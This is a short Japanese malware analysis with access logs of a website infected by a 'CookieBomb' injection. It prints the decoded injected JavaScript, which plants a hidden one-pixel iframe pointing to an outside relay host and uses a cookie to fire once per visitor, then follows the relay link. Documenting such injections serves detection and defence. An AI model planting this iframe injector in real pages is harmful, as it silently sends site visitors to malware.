CookieBombインジェクションに感染されたサイトのアクセスログ...

1. // CookieBombインジェクションに感染されたサイトのアクセスログ...
2.  
3. --2013-07-15 16:57:36-- hxxp://www.antjapan.co.jp/catalog/
4. Resolving www.antjapan.co.jp... 211.10.17.56
5. Caching www.antjapan.co.jp => 211.10.17.56
6. Connecting to www.antjapan.co.jp|211.10.17.56|:80... connected.
7. :
8. GET /catalog/ HTTP/1.1
9. Host: www.antjapan.co.jp
10. HTTP request sent, awaiting response...
11. :
12. HTTP/1.1 200 OK
13. Date: Mon, 15 Jul 2013 07:55:25 GMT
14. Server: Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
15. X-Powered-By: PHP/4.4.4
16. Set-Cookie: osCsid=e1c9ded7019391417e944b64b8cbf1a4; path=/catalog
17. Expires: Thu, 19 Nov 1981 08:52:00 GMT
18. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
19. Pragma: no-cache
20. Keep-Alive: timeout=10, max=128
21. Connection: Keep-Alive
22. Transfer-Encoding: chunked
23. Content-Type: text/html; charset=EUC-JP
24. 200 OK
25. :
26. Length: unspecified [text/html]
27. Saving to: ‘index.html’
28. 2013-07-15 16:57:36 (200 KB/s) - ‘index.html’ saved [4959]
29.  
30. // index.htmlにオOCJP-112のマルウェア感染コードを発見しました。
31.  
32. // decodeすると...
33.  
34. function zzzfff(){
35. var h = document.createElement('iframe');
36. h.src = 'hxxp://www.verdaedevelopment.com/_js/relay.php';
37. h.style.position = 'absolute';
38. h.style.border = '0';
39. h.style.height = '1px';
40. h.style.width = '1px';
41. h.style.left = '1px';
42. h.style.top = '1px';
43. if (!document.getElementById('h')){
44. document.write('<div id=\'h\'></div>');
45. document.getElementById('h').appendChild(h);
46. }
47. }
48. function SetCookie(cookieName, cookieValue, nDays, path){
49. var today = new Date();
50. var expire = new Date();
51. if (nDays == null || nDays == 0)nDays = 1;
52. expire.setTime(today.getTime() + 3600000 * 24 * nDays);
53. document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
54. toGMTString() + ((path) ? "; path=" + path : "");
55. }
56. function GetCookie(name){
57. var start = document.cookie.indexOf(name + "=");
58. var len = start + name.length + 1;
59. if ((!start) && (name != document.cookie.substring(0, name.length))){
60. return null;
61. }
62. if (start == - 1)return null;
63. var end = document.cookie.indexOf(";", len);
64. if (end == - 1)end = document.cookie.length;
65. return unescape(document.cookie.substring(len, end));
66. }
67. if (navigator.cookieEnabled){
68. if (GetCookie('visited_uq') == 55){
69. }
70. else {
71. SetCookie('visited_uq', '55', '1', '/');
72. zzzfff();
73. }
74. }
75.  
76. // マルウェアのリンクをフォローすると....
77.  
78. --2013-07-15 17:06:16-- hxxp://www.verdaedevelopment.com/_js/relay.php
79. Resolving www.verdaedevelopment.com... 174.120.172.123
80. Caching www.verdaedevelopment.com => 174.120.172.123
81. Connecting to www.verdaedevelopment.com|174.120.172.123|:80... connected.
82. :
83. GET /_js/relay.php HTTP/1.1
84. Referer: http://www.antjapan.co.jp/catalog/
85. Host: www.verdaedevelopment.com
86. HTTP request sent, awaiting response...
87. :
88. HTTP/1.1 200 OK
89. Date: Mon, 15 Jul 2013 08:04:06 GMT
90. Server: Apache
91. Keep-Alive: timeout=5, max=75
92. Connection: Keep-Alive
93. Transfer-Encoding: chunked
94. Content-Type: text/html
95. 200 OK
96. Length: unspecified [text/html]
97. Saving to: ‘relay.php’
98. 2013-07-15 17:06:17 (20.8 KB/s) - ‘relay.php’ saved [2]
99.  
100. // 「relay.php」はマルウェア転送スクリプトで、条件/タイミングが合わないと「ok」などの回答が出る。
101. $ cat relay.php
102. ok